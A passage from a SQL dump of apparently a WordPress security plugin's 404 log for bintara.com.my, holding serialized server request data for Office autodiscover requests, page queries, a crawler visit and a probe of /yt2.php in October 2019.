Office\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:10:\"Production\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:3:\"Mac\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"27C26C6D-9C74-43F2-AB7E-9D8A708448A1\";s:21:\"HTTP_X_OFFICE_VERSION\";s:9:\"16.29.917\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:2:\"on\";s:16:\"REDIRECT_H2_PUSH\";s:2:\"on\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:5:\"390-1\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaUqBsE4BdCUBZ68BkR1TgAAAAE\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"175.142.115.243\";s:11:\"REMOTE_PORT\";s:5:\"54692\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaUqBsE4BdCUBZ68BkR1TgAAAAE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571105287.0788\";s:12:\"REQUEST_TIME\";s:10:\"1571105287\";}}','notice','2019-10-15 02:08:09','2019-10-15 02:08:07',35355824,37158960,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'175.142.115.243'),(28039,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"315\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"3D4FB605-3F6D-43A3-8020-0B65FB252378\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaUYrMlTSMr1FladyDvAQgAAARc\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"175.142.115.243\";s:11:\"REMOTE_PORT\";s:5:\"50124\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaUYrMlTSMr1FladyDvAQgAAARc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571100844.2056\";s:12:\"REQUEST_TIME\";s:10:\"1571100844\";}}','notice','2019-10-15 00:54:07','2019-10-15 00:54:04',35734584,37529424,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'175.142.115.243'),(28038,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"317\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"7B9BA837-4D11-460A-ADF0-295B66463310\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaUTj8E4BdCUBZ68BkRl3AAAAZA\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"175.142.115.243\";s:11:\"REMOTE_PORT\";s:5:\"59062\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaUTj8E4BdCUBZ68BkRl3AAAAZA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571099535.9933\";s:12:\"REQUEST_TIME\";s:10:\"1571099535\";}}','notice','2019-10-15 00:32:18','2019-10-15 00:32:16',35738536,37535624,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'175.142.115.243'),(28037,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:140:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36 OPR/40.0.2308.81 (Edition Yx)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"137.74.4.69\";s:11:\"REMOTE_PORT\";s:5:\"58967\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaT8nDUl7OmlLIsmLFm7@wAAABY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571093660.4791\";s:12:\"REQUEST_TIME\";s:10:\"1571093660\";}}','notice','2019-10-14 22:54:23','2019-10-14 22:54:20',35424568,37235920,'https://bintara.com.my/?page_id=18',1,0,'137.74.4.69'),(28036,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:50:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:8:\"/yt2.php\";s:14:\"CONTENT_LENGTH\";s:2:\"28\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:4:\"POST\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:30:\"https://bintara.com.my/yt2.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:8:\"/yt2.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XaTQ4DUl7OmlLIsmLFml-AAAAAc\";s:19:\"REDIRECT_SCRIPT_URI\";s:30:\"https://bintara.com.my/yt2.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:8:\"/yt2.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaTQ4DUl7OmlLIsmLFml-AAAAAc\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:13:\"193.106.30.99\";s:11:\"REMOTE_PORT\";s:5:\"43824\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:30:\"https://bintara.com.my/yt2.php\";s:10:\"SCRIPT_URL\";s:8:\"/yt2.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaTQ4DUl7OmlLIsmLFml-AAAAAc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571082464.8686\";s:12:\"REQUEST_TIME\";s:10:\"1571082464\";}}','notice','2019-10-14 19:47:48','2019-10-14 19:47:45',35419216,37227640,'https://bintara.com.my/yt2.php',1,0,'193.106.30.99'),(28035,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:22:\"/information-security/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_FROM\";s:24:\"bingbot(at)microsoft.com\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:195:\"Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:44:\"https://bintara.com.my/information-security/\";s:19:\"REDIRECT_SCRIPT_URL\";s:22:\"/information-security/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaTL6DUl7OmlLIsmLFmiTwAAABQ\";s:12:\"REDIRECT_URL\";s:22:\"/information-security/\";s:11:\"REMOTE_ADDR\";s:13:\"207.46.13.189\";s:11:\"REMOTE_PORT\";s:5:\"14302\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:44:\"https://bintara.com.my/information-security/\";s:10:\"SCRIPT_URL\";s:22:\"/information-security/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaTL6DUl7OmlLIsmLFmiTwAAABQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571081192.355\";s:12:\"REQUEST_TIME\";s:10:\"1571081192\";}}','notice','2019-10-14 19:26:37','2019-10-14 19:26:33',34323864,36125448,'https://bintara.com.my/information-security/',1,0,'207.46.13.189'),(28034,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:131:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.189 Safari/537.36 Vivaldi/1.95.1077.60\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"137.74.4.69\";s:11:\"REMOTE_PORT\";s:5:\"62832\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaTH4DUl7OmlLIsmLFmgbAAAAAI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571080160.6203\";s:12:\"REQUEST_TIME\";s:10:\"1571080160\";}}','notice','2019-10-14 19:09:23','2019-10-14 19:09:21',35466720,37271720,'https://bintara.com.my/?page_id=18',1,0,'137.74.4.69'),(28032,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:35:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=11\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:34:\"https://bintara.com.my/?page_id=11\";s:15:\"HTTP_USER_AGENT\";s:131:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36 OPR/55.0.2994.44\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=11\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"91.236.74.17\";s:11:\"REMOTE_PORT\";s:5:\"50693\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaSb7WfO-tVFZ234mVhj8AAAAAI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571068909.7209\";s:12:\"REQUEST_TIME\";s:10:\"1571068909\";}}','notice','2019-10-14 16:01:53','2019-10-14 16:01:50',35459944,37272736,'https://bintara.com.my/?page_id=11',1,0,'91.236.74.17'),(28033,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:153:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.104 Safari/537.36 Core/1.53.2717.400 QQBrowser/9.6.11133.400\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"209.99.136.105\";s:11:\"REMOTE_PORT\";s:5:\"55585\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaS6QzUl7OmlLIsmLFmZ4AAAAAI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571076675.526\";s:12:\"REQUEST_TIME\";s:10:\"1571076675\";}}','notice','2019-10-14 18:11:18','2019-10-14 